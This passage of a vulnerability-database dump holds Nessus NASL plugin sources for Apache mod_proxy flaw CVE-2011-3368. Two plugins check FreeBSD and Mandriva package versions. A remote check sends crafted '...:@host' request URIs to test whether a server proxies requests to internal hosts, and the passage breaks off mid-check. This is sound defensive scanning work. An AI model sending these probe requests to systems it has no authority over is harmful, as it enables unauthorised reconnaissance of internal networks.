ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56816);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. There is no patch against\nthis issue!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://httpd.apache.org/security/vulnerabilities_13.html\"\n );\n # http://seclists.org/fulldisclosure/2011/Oct/232\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Oct/232\"\n );\n # https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60d9264c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache-1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<1.3.43.1.59_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache-1.3<1.3.43+30.23_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.43+30.23_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T11:53:25", "description": "A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2011-10-10T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2011:144)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-10T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_userdir"], "id": "MANDRIVA_MDVSA-2011-144.NASL", "href": "https://www.tenable.com/plugins/nessus/56428", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:144. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56428);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2011:144)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-base-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-devel-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-htcacheclean-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_authn_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dav-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_deflate-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_disk_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_file_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ldap-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_mem_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ssl-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_userdir-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-modules-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-event-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-itk-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-peruser-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-prefork-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-worker-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-source-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-htcacheclean-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:20:55", "description": "The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. This allows a remote attacker to indirectly send requests to\nintranet servers.", "edition": 23, "published": "2011-11-29T00:00:00", "title": "Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/56972", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56972);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_bugtraq_id(49957, 50802);\n script_xref(name:\"EDB-ID\", value:\"17969\");\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. This allows a remote attacker to indirectly send requests to\nintranet servers.\"\n );\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/%3C20111005141541.GA7696%40redhat.com%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fedbcf7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.qualys.com/blogs/securitylabs/tags/cve-2011-4317\");\n script_set_attribute(attribute:\"see_also\", value:\"http://thread.gmane.org/gmane.comp.apache.devel/46440\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Apache httpd 2.2.22 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd.');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd.');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. just to be on the safe side,\n # we'll explicitly check for a 200 or 404\n if (http_code == 404 || http_code == 200)\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = 